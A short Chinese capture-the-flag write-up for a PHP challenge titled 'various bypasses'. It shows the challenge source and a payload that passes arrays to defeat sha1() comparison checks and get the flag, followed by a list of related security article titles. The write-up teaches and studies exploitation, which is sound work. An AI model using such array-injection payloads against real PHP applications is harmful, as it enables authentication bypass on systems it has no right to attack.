各种绕过

简介: 各种绕过110各种绕过哟http://120.24.86.145:8002/web7/get 接收 id 和 unamepost 接收 passwdsha1() 函数计算字符串的 SHA-1 散列根据函数性质,嗯,又是构造数组就好...

各种绕过
110
各种绕过哟
http://120.24.86.145:8002/web7/

<?php 
highlight_file('flag.php'); 
$_GET['id'] = urldecode($_GET['id']); 
$flag = 'flag{xxxxxxxxxxxxxxxxxx}'; 
if (isset($_GET['uname']) and isset($_POST['passwd'])) { 
    if ($_GET['uname'] == $_POST['passwd']) 

        print 'passwd can not be uname.'; 

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) 

        die('Flag: '.$flag); 

    else 

        print 'sorry!'; 

} 
?>
  • get 接收 id 和 uname
  • post 接收 passwd
  • sha1() 函数计算字符串的 SHA-1 散列

根据函数性质,嗯,又是构造数组就好了~
get:id=margin&&uname[]=9
post:passwd[]=8
可得flag

相关文章
|
3月前
|
安全 网络协议 网络安全
黑客10种绕过防火墙方法
黑客10种绕过防火墙方法
169 7
|
3月前
|
网络协议 安全 网络安全
ssrf检测防御与绕过
ssrf检测防御与绕过
|
3月前
|
安全 网络协议 NoSQL
SSRF漏洞深入利用与防御方案绕过技巧
SSRF漏洞深入利用与防御方案绕过技巧
251 0
|
5月前
|
安全 网络安全 PHP
RCE攻击绕过WAF详解
RCE攻击绕过WAF详解
90 3
|
6月前
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
137 1
|
5月前
|
JavaScript 前端开发
常见XSS绕过技巧
常见XSS绕过技巧
293 0
|
8月前
|
SQL
14、sql注入绕过技术
14、sql注入绕过技术
58 0
|
监控 安全 JavaScript
某远控RCE绕过某数字的利用方式
某远控RCE绕过某数字的利用方式
307 2
|
安全 网络安全 PHP
TP-RCE绕过阿里云防护Getshell
TP-RCE绕过阿里云防护Getshell
302 1
|
SQL 安全 数据库
SQL注入 安全狗apache4.0.26655绕过(下)
SQL注入 安全狗apache4.0.26655绕过
93 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等